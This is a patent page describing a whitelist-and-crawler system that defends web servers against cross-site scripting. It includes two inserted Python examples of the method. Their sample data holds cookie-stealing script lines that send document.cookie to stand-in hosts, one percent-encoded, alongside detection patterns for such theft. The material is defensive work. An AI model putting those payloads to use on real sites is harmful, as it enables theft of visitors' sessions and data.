TWI506471B - System and method for defending against cross-site scripting - Google Patents

Info

Publication number
TWI506471B
Authority
TW
Taiwan
Application number
TW100148781A
Other languages
Chinese (zh)
Other versions
TW201327250A
Inventor
Shi Jinn Horng
Wei Feng Hsu
Original Assignee
Univ Nat Taiwan Science Tech
Application filed by Univ Nat Taiwan Science Tech
Priority to TW100148781A
Publication of TW201327250A
Application granted
Publication of TWI506471B

Landscapes

  • Computer And Data Communications (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Description

Cross-site attack prevention system and method

The present invention relates to a cross-site attack prevention system and method, and in particular to a cross-site attack prevention system and method that is installed in a website server, simplifies deployment, and provides an effective defense mechanism.

With the rapid growth and spread of the Internet, web content has become ever richer, and web pages have evolved from the early static pages into dynamic pages that make heavy use of dynamic web technologies. These advances have made web applications more diverse and more interactive. At the same time, however, they have created security problems in many web systems and have made it harder for computer protection systems to detect intrusions and provide protection.

Cross-Site Scripting (XSS) is currently one of the most serious information-security weaknesses worldwide. It is a classic web security vulnerability that an attacker can exploit to steal user cookies or user data. In a typical cross-site attack, the attacker embeds a malicious script parameter (script) into the code of a web page served by a website server and then uses social engineering to lure visitors into clicking it. When a visitor clicks, if the application serving the page has not filtered out the extraneous code, the visitor's browser executes the malicious script code, which sends the victim's cookie to a third-party website the attacker set up beforehand; the attacker can thereby steal the victim's private data, such as online account names, passwords, or even credit card numbers. Beyond the severe harm to an individual user's information security, cross-site attacks have a major impact on daily life, the economy, and even national defense.

Given the current trend toward interactive web applications, web architectures are more complex than before, which increases the technical difficulty and complexity of detecting cross-site attacks; even experienced developers find it hard to filter every kind of code completely. Moreover, from the user's point of view, the general public's awareness of cross-site attacks is even weaker, so it is extremely difficult to expect ordinary users to discover or defend against them.

Current deployments of systems for defending against cross-site attacks fall into three architectures: installed on the client side, installed on the server side, or installed on both the client and the server. For most Internet users, the steps for installing and configuring a client-side defense are too complicated, and most users cannot judge whether a cross-site attack is taking place, so such a solution is hard to bring into everyday use. The hybrid client-and-server approach is even more cumbersome: in addition to the client-side difficulties just mentioned, the server-side system must be coordinated with the client-side system, which multiplies the complexity.

Furthermore, a server-side system requires developers to spend time configuring and testing firewall rules. Although this is less complicated than the two approaches above, writing such rules is still far from easy; a developer must be experienced and very careful to configure a system with adequate defensive capability. There is therefore a need for a detection system that is easy to configure and at the same time defends efficiently, so that cross-site attacks that may occur at any time can be handled and their harm minimized.

Accordingly, one aspect of the present invention is to provide a cross-site attack prevention system that can easily be installed on the website server side and provides effective defensive capability, so as to solve the problems of the prior art.

According to one embodiment, the cross-site attack prevention system of the present invention is installed in a website server, where the website server allows a client to log in and provides web page data to the client on request. The cross-site attack prevention system comprises a database, a filtering engine, a web crawler, and a script parameter detector.

In this embodiment, the database stores a whitelist table, and the whitelist table holds at least one allowed web page address. The filtering engine is connected to the database; it compares the web page addresses to be checked that are contained in the web page data served by the website server against the allowed web page addresses in the whitelist table to see whether they are identical, can determine whether a web page address contains a script parameter, and can replace the web page address to be checked in the web page data with blank characters. The web crawler is connected to the filtering engine and the database; it reads the web page address to be checked and downloads the script parameters it contains. The script parameter detector is connected to the web crawler to detect whether the script parameters downloaded by the web crawler contain behaviour that transmits the client's data to a third-party website. Because the website attack prevention system of this embodiment first outputs a suspicious web page address to be checked as blank characters, it prevents the situation in which a user clicks malicious code and thereby suffers a cross-site attack.

Another aspect of the present invention is to provide a cross-site attack prevention method that is applied in a website server to effectively provide defensive capability against cross-site attacks.

According to one embodiment, the cross-site attack prevention method of the present invention first compares whether the web page address to be checked contained in the web page data served by the website server is identical to an allowed web page address stored in the whitelist table. Then, depending on the result of the comparison, it selectively replaces the web page address to be checked in the web page data with blank characters, and at the same time determines whether the web page address to be checked contains a script parameter. Depending on the result of that determination, it selectively downloads the script parameter of the web page address to be checked. Finally, it detects whether the downloaded script parameter exhibits behaviour that transmits the client's data to a third-party website.

In this embodiment, when the web page address to be checked does not match an allowed web page address in the whitelist table, the cross-site attack prevention method replaces the web page address to be checked in the web page data with blank characters, has the website server provide the client with the web page data in which the address has been replaced by blank characters, and further determines whether the web page address to be checked contains a script parameter. When the web page address to be checked is determined to contain a script parameter, the script parameters contained in the page to be checked are downloaded in the background, and the downloaded script parameters are examined for behaviour that transmits the client's data to a third-party website. Because the website attack prevention method of this embodiment first outputs a suspicious web page address to be checked as blank characters, it prevents the situation in which a user clicks malicious code and thereby suffers a cross-site attack.

The advantages and spirit of the present invention may be further understood from the following detailed description of the invention and the accompanying drawings.

Please refer to FIG. 1, which is a schematic diagram of a cross-site attack prevention system 1 according to an embodiment of the present invention. As shown in FIG. 1, the cross-site attack prevention system 1 is installed in a website server 2, and a client 3 can log in to the website server 2. The website server 2 has an application 20 that the client 3 can log in to; when the client 3 logs in to the application 20, it sends the website server 2 a request to browse web page data, and the application 20 retrieves the corresponding web page data from the web page database 22 according to the request and outputs it to the client 3.

In this embodiment, the cross-site attack prevention system 1 may comprise a database 10, a filtering engine 12, a web crawler 14, and a script parameter detector 16. A whitelist table 100 is established in the database 10, and the whitelist table 100 stores at least one allowed web page address. Note that an allowed web page address in the whitelist table 100 is a web page address that has already been determined to contain no cross-site attack; the client 3 will not suffer a cross-site attack when it clicks an allowed web page address in its browser. The allowed web page addresses in the whitelist table 100 may be stored manually by the administrator of the website server 2, or stored automatically by the cross-site attack prevention system 1 of this embodiment; the details of how the cross-site attack prevention system 1 automatically stores allowed web page addresses in the whitelist table 100 are explained in the paragraphs below.

The filtering engine 12 is connected to the database 10, the web crawler 14 is connected to the filtering engine 12 and the database 10, and the script parameter detector 16 is connected to the web crawler 14. In this embodiment the filtering engine 12 is further connected to the application 20; in practice, however, the filtering engine 12 may also be built directly into the application 20, and the present invention places no restriction on this. The filtering engine 12 can compare whether the web page address to be checked in the web page data that the application 20 retrieves from the application database 22 is identical to an allowed web page address stored in the whitelist table 100 of the database 10. In addition, the filtering engine 12 can determine whether the web page address to be checked contains a script parameter, for example JavaScript. Further, the filtering engine 12 can also replace the web page address to be checked in the web page data with blank characters, so that the application 20 can output the web page data with the address replaced by blank characters to the client 3.

The web crawler 14 is connected to the filtering engine 12 and the database 10 in order to read the web page address to be checked and download the script parameters contained in it, for example JavaScript. In this embodiment, besides the whitelist table 100, the database 10 also contains a pending-list temporary table 102 connected to the filtering engine 12 and the web crawler 14. The pending-list temporary table 102 receives and stores web page addresses to be checked from the filtering engine 12, and the web crawler 14 reads web page addresses to be checked from the pending-list temporary table 102 in order to download their script parameters. Note that the web crawler 14's reading of the web page address to be checked and downloading of its script parameters can both be performed in the background; that is, the operation of the web crawler 14 does not affect the client 3's browsing and use of web pages through the application 20.

The script parameter detector 16 is connected to the web crawler 14 and can detect whether the script parameters downloaded by the web crawler 14 contain behaviour that transmits the client's data to a third-party website. In practice, the kind of script parameter detector 16 may differ according to the script parameter; for example, if the script parameter is JavaScript, the script parameter detector 16 may be a js-detector. Likewise, the script parameter detector 16 can also operate in the background without affecting the client's browsing and use of web pages. Because malicious script parameters are usually encoded in various ways to evade detection, the script parameter detector 16 can first decode the script parameter and then detect whether the decoded script parameter exhibits behaviour that transmits the client's data to a third-party website. Moreover, in a malicious attack the script parameter usually transmits the client's private data, for example the cookies recorded in the client's browser, to a third-party website for collection. However, cross-site attack methods change constantly, and besides cookies an attacker may also exploit other client information, so the script parameter detector 16 of this embodiment detects whether the script parameter transmits any client data at all to a third-party website, without restricting the type of data, as the basis for judging whether the script parameter is malicious.

The cross-site attack prevention system 1 described above can defend efficiently against cross-site attacks by following a defined procedure. Please refer to FIG. 2, which is a flow chart of the steps of a cross-site attack prevention method according to another embodiment of the present invention. The method of this embodiment can be carried out with the website attack prevention system 1 of FIG. 1; in what follows, please also refer to FIG. 1 for a detailed explanation of the steps of the method of this embodiment.

As shown in FIG. 2, the cross-site attack prevention method of this embodiment comprises the following steps. In step S40, the web page address to be checked contained in the web page data is compared with the at least one allowed web page address stored in the whitelist table to see whether they are identical. Next, in step S42, depending on the result of the comparison in step S40, the web page address to be checked is selectively replaced with at least one blank character, and it is determined whether the web page address to be checked contains a script parameter. In step S44, depending on the result of the determination in step S42, the script parameter of the web page address to be checked is selectively downloaded. Finally, in step S46, the downloaded script parameter is examined for behaviour that transmits data to a third-party website.

Taking the cross-site attack prevention system 1 of the embodiment above as an example: in step S40, the filtering engine 12 compares the web page address to be checked contained in the web page data retrieved by the application 20 with the allowed web page addresses stored in the whitelist table 100 of the database 10 to see whether they are identical. Next, in step S42, depending on the result of the comparison in step S40, the filtering engine 12 selectively replaces the web page address to be checked in the web page data with blank characters and determines whether the web page address to be checked contains any script parameter. In practice, the application 20 can first output the web page data, with the address to be checked replaced by blank characters, directly to the client 3, so the client 3 cannot click on a malicious script parameter. Next, in step S44, according to the result of determining in step S42 whether the web page address to be checked contains a script parameter, the web crawler 14 can read the web page address to be checked and download its script parameter. In step S46, the script parameter detector 16 can detect whether the downloaded script parameter exhibits behaviour that transmits the client's data to a third-party website; likewise, in practice step S46 may be carried out by having the script parameter detector 16 first decode the script parameter and then detect whether it transmits the client's data to a third-party website.

Please refer to FIG. 3, which is a more detailed flow chart of the steps of the cross-site attack prevention method of FIG. 2.

As shown in FIG. 3, after the filtering engine 12 has compared in step S40 whether the web page address to be checked is identical to an allowed web page address stored in the whitelist table, if the comparison result is yes, then in step S420 the application 20 outputs the web page data directly to the client 3; the web page address to be checked contained in the web page data output at this point has already been confirmed as one of the allowed web page addresses. If the comparison result of step S40 is no, that is, the web page address to be checked differs from every allowed web page address in the whitelist table, then in step S422 the filtering engine 12 replaces the web page address to be checked in the web page data with blank characters, and the application 20 outputs the web page data with the address replaced by blank characters to the client 3; then, in step S424, the filtering engine 12 further determines whether the web page address to be checked contains a script parameter.

When the result of the determination in step S424 is no, it is determined in step S440 that the web page address to be checked contains no cross-site attack, and the web page address to be checked can be stored in the whitelist table 100 as an allowed web page address. Therefore, when the filtering engine 14 next encounters the same web page address to be checked, the comparison in step S40 finds it identical to an allowed web page address in the whitelist table 100, and it is output directly to the client 3 in step S420.

On the other hand, when the result of the determination in step S424 is yes, in step S442 the filtering engine 12 can store the web page address to be checked in the pending-list temporary table 102, and the web crawler 14 can read this web page address to be checked from the pending-list temporary table 102 and download its script parameters. In practice, one set of web page data may contain several web page addresses to be checked, and the web crawler 14's reading and downloading of script parameters is relatively time-consuming. Therefore, the cross-site attack prevention system and method described above can first replace all web page addresses to be checked that are not in the whitelist table with blank characters and provide the result to the client 3, then, after determining whether they contain script parameters, place the addresses to be checked that do contain script parameters in the pending-list temporary table 102 and let the web crawler 14 read those pages and download their script parameters one after another in the background. In other words, the client 3 obtains the web page data as soon as the filtering engine 12 has confirmed that the web page address to be checked is an allowed web page address, or has replaced it with blank characters, and the response speed of the application 20 is not held back by waiting for the web crawler 14 to download script parameters.

After the script parameters have been downloaded in step S442, in step S46 the script parameter detector 16 can detect whether the downloaded script parameters exhibit behaviour that transmits the client's data to a third-party website. When the result of the detection in step S46 is no, the method of this embodiment returns to step S440 and stores the web page address to be checked in the whitelist table 100 as an allowed web page address. When the result of the detection in step S46 is yes, the web page address to be checked is judged in step S48 to contain malicious code constituting a cross-site attack. Likewise, the script parameter detector 16's detection of whether the downloaded script parameters transmit data can also be performed in the background without affecting the speed at which the application 20 responds to the client 3.

In addition, to speed up the comparison performed by the cross-site attack prevention system 1 and method of the embodiments above, each allowed web page address is encoded to obtain a hash value, and each hash value is stored in the whitelist table 100 in a hash column corresponding to that allowed web page address. When the filtering engine 12 compares a web page address to be checked, it first encodes the address to obtain its hash value to be checked, and then uses that hash value to search the whitelist table 100 for a matching hash value, which speeds up the comparison of whether the web page address to be checked is an allowed web page address.
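The flow of steps S40 to S48 and the hash-keyed whitelist lookup above, as an added example that is not the patent's own code: a toy filtering engine (12), pending-list table (102), hash-keyed whitelist table (100) and script parameter detector (16). SHA-256 as the hash, the URL-pattern and cookie-to-sink heuristics, and the constructed sample page and "downloaded" scripts are all assumptions of this example; the real crawler's network fetch is replaced by a dict.

```python
"""Toy model of the patent's filtering engine, pending list, whitelist and
script parameter detector (added example; heuristics and hash are assumptions)."""
import hashlib
import html
import re
from urllib.parse import unquote

# Attribute values that carry addresses in the served page data.
URL_RE = re.compile(r'(?:href|src)\s*=\s*"([^"]*)"', re.IGNORECASE)


def url_hash(url: str) -> str:
    # Whitelist rows hold a hash of each allowed address (claim 4).
    # SHA-256 is an assumption; the patent does not name the hash function.
    return hashlib.sha256(url.encode("utf-8")).hexdigest()


def decode_script(text: str) -> str:
    # Step S46 decodes before inspecting. Percent- and entity-encoding are
    # undone repeatedly until stable, which also covers double encoding.
    prev, cur = None, text
    while prev != cur:
        prev, cur = cur, html.unescape(unquote(cur))
    return cur


def has_script_parameter(url: str) -> bool:
    # Step S424 heuristic (assumed): an inline script marker in the decoded address.
    decoded = decode_script(url).lower()
    return any(m in decoded for m in ("javascript:", "<script", "onerror="))


# Detector (16) heuristic (assumed): flag a script that reads client-side data
# AND hands it to an outbound sink (request, image load, redirect, beacon).
READS = re.compile(r"document\.cookie|localStorage|sessionStorage", re.IGNORECASE)
SINKS = re.compile(
    r"XMLHttpRequest|fetch\s*\(|new\s+Image|\.src\s*=|location(\.href)?\s*=|sendBeacon",
    re.IGNORECASE)


def exfiltrates_client_data(script: str) -> bool:
    decoded = decode_script(script)
    return bool(READS.search(decoded)) and bool(SINKS.search(decoded))


class PreventionSystem:
    def __init__(self, allowed_urls):
        self.whitelist = {url_hash(u) for u in allowed_urls}   # table 100 (hash column)
        self.pending = []                                      # table 102
        self.malicious = []                                    # step S48 verdicts

    def filter_page(self, page_html: str) -> str:
        """Steps S40/S42: whitelisted addresses pass through unchanged; every
        other address is blanked in the served page and either whitelisted
        (no script parameter, S440) or queued for the crawler (S442)."""
        def replace(match):
            url = match.group(1)
            if not url or url_hash(url) in self.whitelist:     # S40 yes -> S420
                return match.group(0)
            if has_script_parameter(url):                      # S424 yes -> S442
                if url not in self.pending and url not in self.malicious:
                    self.pending.append(url)
            else:                                              # S424 no -> S440
                self.whitelist.add(url_hash(url))
            return match.group(0).replace(url, " ")            # S422 blank it
        return URL_RE.sub(replace, page_html)

    def process_pending(self, downloads):
        """Steps S44/S46/S48, run in the background by crawler (14) and
        detector (16); `downloads` maps a queued address to its fetched script."""
        while self.pending:
            url = self.pending.pop(0)
            if exfiltrates_client_data(downloads.get(url, "")):
                self.malicious.append(url)                     # S48
            else:
                self.whitelist.add(url_hash(url))              # S440


# Constructed sample page and fetched scripts (not from the patent).
NEWS_URL = "https://example.org/news?q=%3Cscript%3Etest%3C/script%3E"
SAMPLE_PAGE = ('<a href="https://example.org/home">home</a> '
               f'<a href="{NEWS_URL}">news</a> '
               '<a href="https://example.org/about">about</a>')
SAMPLE_DOWNLOADS = {
    # percent-encoded: new Image().src="https://third-party.example/c?"+document.cookie
    NEWS_URL: "new%20Image().src%3D%22https%3A//third-party.example/c%3F%22%2Bdocument.cookie",
}


def demo():
    system = PreventionSystem(["https://example.org/home"])
    first = system.filter_page(SAMPLE_PAGE)       # news and about both blanked
    system.process_pending(SAMPLE_DOWNLOADS)      # background crawl + detection
    second = system.filter_page(SAMPLE_PAGE)      # about now whitelisted, news still blank
    return first, second, list(system.malicious)
```

On the first request both non-whitelisted links are served blank, and only after the background pass does the harmless one start passing through, which is the latency trade-off the text describes.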

In summary, the cross-site attack prevention system and method of the present invention first compare the web page address to be checked in the web page data output by the website server with the allowed web page addresses in the database's whitelist table to see whether they are identical; if the web page address to be checked is not an allowed web page address, the system replaces it in the web page data with blank characters and outputs the result to the client, so that the client is not exposed to a malicious code attack. For a web page address to be checked that has been found not to match any allowed web page address in the whitelist table, its script parameters can be downloaded in the background and examined for behaviour that transmits the client's data to a third-party website; if the data at the web page address to be checked contains no script parameter, or its script parameter does not transmit the client's data to a third-party website, the web page address to be checked can be stored in the whitelist table as an allowed web page address, and the client can access it normally the next time it is read. Compared with the prior art, the cross-site attack prevention system and method of the present invention are built on the website server side, can be set up simply without configuring and testing firewall rules, and effectively prevent the user side from suffering malicious code attacks.

The detailed description of the preferred embodiments above is intended to describe the features and spirit of the present invention more clearly, not to limit the scope of the present invention to the preferred embodiments disclosed. On the contrary, the intention is to cover various modifications and equivalent arrangements within the scope of the claims of the present invention. Therefore, the scope of the claims of the present invention should be given the broadest interpretation in light of the description above, so as to encompass all possible modifications and equivalent arrangements.

1...cross-site attack prevention system
10...database
12...filtering engine
14...web crawler
16...script parameter detector
100...whitelist table
102...pending-list temporary table
2...website server
20...application
122...application database
3...client
S40~S48...process steps

FIG. 1 is a schematic diagram of a cross-site attack prevention system according to an embodiment of the present invention.

FIG. 2 is a flow chart of the steps of a cross-site attack prevention method according to another embodiment of the present invention.

FIG. 3 is a more detailed flow chart of the steps of the cross-site attack prevention method of FIG. 2.


Claims (10)

1. A cross-site attack prevention system, installed in a website server, the website server being able to let a client log in and providing web page data to the client according to the client's request, the cross-site attack prevention system comprising: a database storing a whitelist table, the whitelist table storing at least one allowed web page address; a filtering engine connected to the database, the filtering engine being used to compare whether a web page address to be checked contained in the web page data is identical to the at least one allowed web page address in the whitelist table, wherein if the comparison result is identical, an application connected to the filtering engine outputs the web page data directly to the client, and if the comparison result is not identical, the filtering engine replaces the web page address to be checked in the web page data with at least one blank character and further determines whether the web page address to be checked contains a script parameter; a web crawler connected to the filtering engine and the database, the web crawler being used, when the filtering engine determines that the web page address to be checked contains the script parameter, to read the web page address to be checked in order to download the script parameter; and a script parameter detector connected to the web crawler, for detecting whether the script parameter downloaded by the web crawler contains behaviour that transmits data of the client to a third-party website.
如申請專利範圍第1項所述之跨網站攻擊防範系統,其中該資料庫進一步包含一待查名單暫存表格,其係連接至該過濾引擎以及該網頁爬蟲,該待查名單暫存表格係用於儲存該待查網頁位址,並且該網頁爬蟲係自該待查名單暫存 表格讀取該待查網頁位址以下載該腳本參數。 The cross-site attack prevention system of claim 1, wherein the database further comprises a pending list temporary storage form, which is connected to the filtering engine and the web crawler, and the pending list temporary table is For storing the address of the web page to be inspected, and the web crawler is temporarily stored from the list to be checked The form reads the to-be-checked web address to download the script parameters. 如申請專利範圍第1項所述之跨網站攻擊防範系統,其中當該腳本參數偵測器偵測出該腳本參數不包含將該用戶端之該資料傳送至該第三方網站之行為時,該網頁爬蟲會將該待查網頁位址存於該白名單表格。 The cross-site attack defense system of claim 1, wherein the script parameter detector detects that the script parameter does not include the act of transmitting the data of the client to the third-party website, The web crawler will store the to-be-checked webpage address in the whitelisted form. 如申請專利範圍第1項所述之跨網站攻擊防範系統,其中該白名單表格會進一步儲存與該至少一允許網頁位址所對應之一雜湊(hash)值,並且該過濾引擎係根據該待查網頁位址所對應之一待查雜湊值,來與該至少一允許網頁位址所對應之該雜湊值進行比對,以比對該待查網頁位址與該至少一允許網頁位址是否相同。 The cross-site attack prevention system of claim 1, wherein the whitelist table further stores a hash value corresponding to the at least one allowed webpage address, and the filtering engine is configured according to the Querying a hash value corresponding to the webpage address to compare the hash value corresponding to the at least one allowed webpage address, to compare whether the webpage address to be checked and the at least one allowed webpage address are the same. 如申請專利範圍第1項所述之跨網站攻擊防範系統,其中該腳本參數偵測器係用於解碼該腳本參數,並偵測解碼後之該腳本參數,是否包含有將該用戶端之該資料傳送至該第三方網站之行為。 The cross-site attack prevention system described in claim 1, wherein the script parameter detector is configured to decode the script parameter, and detect the decoded script parameter, whether the user terminal is included The act of transmitting the data to this third party website. 
一種跨網站攻擊防範方法,用於一網站伺服器,該網站伺服器能供一用戶端登入,並根據該用戶端要求而將一網頁資料提供給該用戶端,該方法包含下列步驟:(a)比對該網頁資料中所包含之一待查網頁位址,與一白名單表格所儲存之至少一允許網頁位址是否相同;(b)若該待查網頁位址與該白名單所儲存之該至少一允許網頁位址中之任何一者之比對結果為不相同,以至少一空白字元來取代該待查網頁位址,並判斷該待查網頁位址是否包含一腳本參數;(c)根據判斷該待查網頁位址時是否包含該腳本參數 之判斷結果,選擇性地下載該待查網頁位址之該腳本參數;以及(d)偵測下載之該腳本參數是否有將該用戶端之一資料傳送至一第三方網站之行為。 A cross-site attack prevention method is provided for a website server, wherein the website server can be used by a client to log in, and a webpage data is provided to the client according to the request of the client. The method comprises the following steps: (a Whether the address of the web page to be inspected included in the webpage data is the same as the at least one webpage address stored in the whitelisting form; (b) if the webpage address to be inspected is stored in the whitelist The comparison result of the at least one allowed webpage address is different, the at least one blank character is used to replace the to-be-checked webpage address, and it is determined whether the to-be-checked webpage address contains a script parameter; (c) Whether the script parameter is included according to the judgment of the address of the webpage to be checked As a result of the determination, the script parameter of the to-be-checked webpage address is selectively downloaded; and (d) detecting whether the downloaded script parameter has a behavior of transmitting the data of one of the client terminals to a third-party website. 如申請專利範圍第6項所述之跨網站攻擊防範方法,其中步驟(b)進一步包含下列步驟:(b1)若步驟(a)中該待查網頁位址與該白名單所儲存之至少一允許網頁位址之比對結果為相同,則將包含該待查網頁位址之該網頁資料提供給該用戶端。 The cross-site attack prevention method described in claim 6 , wherein the step (b) further comprises the following steps: (b1) if the address of the to-be-checked webpage in the step (a) and the whitelist are stored at least one If the comparison result of the webpage address is the same, the webpage data including the address of the webpage to be inspected is provided to the client. 
如申請專利範圍第6項所述之跨網站攻擊防範方法,其中步驟(c)進一步包含下列步驟:(c1)若判斷該待查網頁位址是否包含該腳本參數之結果為否時,將該待查網頁位址存於該白名單表格。 The method for preventing cross-site attack as described in claim 6 , wherein the step (c) further comprises the following steps: (c1) if it is determined whether the result of the script parameter is not included in the website address to be checked, The web page address to be checked is stored in the white list form. 如申請專利範圍第6項所述之跨網站攻擊防範方法,其中步驟(c)進一步包含下列步驟:(c2)若判斷該待查網頁位址是否包含該腳本參數之結果為是時,下載該待查網頁位址之該腳本參數。 The cross-site attack prevention method described in claim 6 , wherein the step (c) further comprises the following steps: (c2) downloading the result if the result of determining whether the web page address to be checked includes the script parameter is The script parameter of the web page address to be checked. 如申請專利範圍第6項所述之跨網站攻擊防範方法,進一步包含下列步驟:(e1)若步驟(d)中偵測下載之該腳本參數有將該用戶端之該資料傳送至該第三方網站之行為,判斷該待查網頁位址為一跨網站攻擊;以及(e2)若步驟(d)中偵測下載之該腳本參數無將該用戶端之該資料傳送至該第三方網站之行為,將該待查網頁位址存於該白名單表格。 The cross-site attack prevention method described in claim 6 further includes the following steps: (e1) if the script parameter detected in the step (d) is downloaded, the data of the client is transmitted to the third party. The behavior of the website, determining that the address of the web page to be inspected is a cross-site attack; and (e2) if the script parameter detected in step (d) does not transmit the data of the client to the third party website And storing the to-be-checked webpage address in the whitelisted form.
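The pipeline the claims describe (whitelist lookup by hash value, blanking of addresses that are not whitelisted, a crawler download that runs only when the address carries a script parameter, and a detector that decodes the script and looks for client data being sent to a third-party host), written out as an added Python example. This is not the patent's implementation and no code accompanies the patent; the class and function names, the regular-expression heuristics used to recognise a "script parameter" and a "third party", the assumed protected host `www.example.com`, and the sample HTML and fetched scripts are all constructed for this example. It also shows the learning step of claims 3, 8 and 10, in which addresses found to be benign are added to the whitelist so that a second pass treats them as allowed.

```python
"""Illustration of the whitelist / crawler / script-parameter pipeline in the claims.
Every identifier, regular expression and sample input below is an assumption made
for this example; none of it is the patent's own implementation."""
import hashlib
import re
from urllib.parse import unquote, urlparse

SITE_HOST = "www.example.com"  # assumed host of the protected web server

# Assumed heuristics (not from the patent): markers of a script parameter in a
# URL, reads of client-side data inside a script, and absolute URLs in a script.
SCRIPT_MARK_RE = re.compile(r"javascript:|<\s*script", re.I)
CLIENT_DATA_RE = re.compile(r"document\.cookie|localStorage|sessionStorage", re.I)
ABS_URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
LINK_RE = re.compile(r"""(href|src)\s*=\s*(["'])([^"']*)\2""", re.I)


def url_hash(url: str) -> str:
    """Claim 4: the whitelist holds a hash per allowed address and compares hashes."""
    return hashlib.sha256(url.encode("utf-8")).hexdigest()


def has_script_parameter(url: str) -> bool:
    """Filter-engine check of claim 1: does the address carry a script parameter?
    The URL is percent-decoded twice so that double-encoded markers are not missed."""
    return bool(SCRIPT_MARK_RE.search(unquote(unquote(url))))


def sends_client_data_to_third_party(script: str) -> bool:
    """Script-parameter detector of claims 1 and 5: decode, then flag a script that
    reads client data and also references a host other than SITE_HOST."""
    decoded = unquote(script)
    if not CLIENT_DATA_RE.search(decoded):
        return False
    hosts = {urlparse(u).hostname for u in ABS_URL_RE.findall(decoded)}
    return any(h and h != SITE_HOST for h in hosts)


class CrossSiteFilter:
    def __init__(self, allowed_urls, fetch):
        self.whitelist = {url_hash(u) for u in allowed_urls}  # database of claim 1
        self.pending = []                                     # pending list of claim 2
        self.fetch = fetch                                    # crawler download, claim 1

    def filter_page(self, html: str):
        """Returns (filtered html, {url: verdict}). Addresses not on the whitelist
        are replaced by blank characters before the page reaches the client."""
        verdicts = {}

        def replace(match):
            attr, quote, url = match.groups()
            if url_hash(url) in self.whitelist:
                verdicts[url] = "allowed"          # step (b1): pass through unchanged
                return match.group(0)
            self.pending.append(url)
            verdicts[url] = self.examine(url)
            return f"{attr}={quote}{' ' * len(url)}{quote}"

        return LINK_RE.sub(replace, html), verdicts

    def examine(self, url: str) -> str:
        """Steps (c), (d), (e1), (e2): crawl only when a script parameter is present;
        addresses found benign are learned into the whitelist."""
        if not has_script_parameter(url):
            self.whitelist.add(url_hash(url))      # step (c1)
            return "whitelisted-no-script"
        script = self.fetch(url)                   # step (c2): crawler downloads
        if sends_client_data_to_third_party(script):
            return "cross-site-attack"             # step (e1)
        self.whitelist.add(url_hash(url))          # step (e2)
        return "whitelisted-after-crawl"


# Constructed sample data so the example runs offline; not real traffic.
SAMPLE_RESPONSES = {
    "https://cdn.example.net/ui.js?cb=<script>":
        "function init(){document.title='ok';}",
    "https://www.example.com/page?q=%3Cscript%3E":
        "new Image().src='https://collector.example.org/?c='+document.cookie",
}
SAMPLE_HTML = ('<a href="https://www.example.com/home">home</a>'
               '<a href="https://partner.example.org/news">news</a>'
               '<script src="https://cdn.example.net/ui.js?cb=<script>"></script>'
               '<a href="https://www.example.com/page?q=%3Cscript%3E">q</a>')


def demo():
    """One filtering pass over the constructed page with a stub crawler."""
    flt = CrossSiteFilter(["https://www.example.com/home"],
                          lambda u: SAMPLE_RESPONSES.get(u, ""))
    return flt.filter_page(SAMPLE_HTML)


if __name__ == "__main__":
    filtered, verdicts = demo()
    for url, verdict in verdicts.items():
        print(f"{verdict:24s} {url}")
    print(filtered)
```

Only the address whose fetched script both reads `document.cookie` and points at a host other than the protected site is classified as a cross-site attack; it is never added to the whitelist, so it is blanked again on every later pass, whereas the two benign addresses are learned and pass through unchanged the second time. The heuristics are deliberately simple: a production detector would need to handle obfuscated scripts and relative URLs, and the double percent-decode is only a partial answer to encoding tricks.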
Priority Applications (1)

Application Number Priority Date Filing Date Title
TW100148781A TWI506471B (en) 2011-12-27 2011-12-27 System and method for defending against cross-site scripting

Publications (2)

Publication Number Publication Date
TW201327250A TW201327250A (en) 2013-07-01
TWI506471B true TWI506471B (en) 2015-11-01

Family

ID=49225052

Country Status (1)

Country Link
TW (1) TWI506471B (en)

Families Citing this family (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN107454041B (en) 2016-05-31 2020-06-02 阿里巴巴集团控股有限公司 Method and device for preventing server from being attacked

Citations (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
TW200825835A (en) * 2006-12-13 2008-06-16 Inst Information Industry System and method of detecting web page vulnerability and recording medium thereof
US20090119769A1 (en) * 2007-11-05 2009-05-07 Microsoft Corporation Cross-site scripting filter
US20090292983A1 (en) * 2007-11-30 2009-11-26 Kunal Anand Html filter for prevention of cross site scripting attacks
CN101964025A (en) * 2009-07-23 2011-02-02 中联绿盟信息技术(北京)有限公司 XSS (Cross Site Scripting) detection method and device

Legal Events

Date Code Title Description
MM4A Annulment or lapse of patent due to non-payment of fees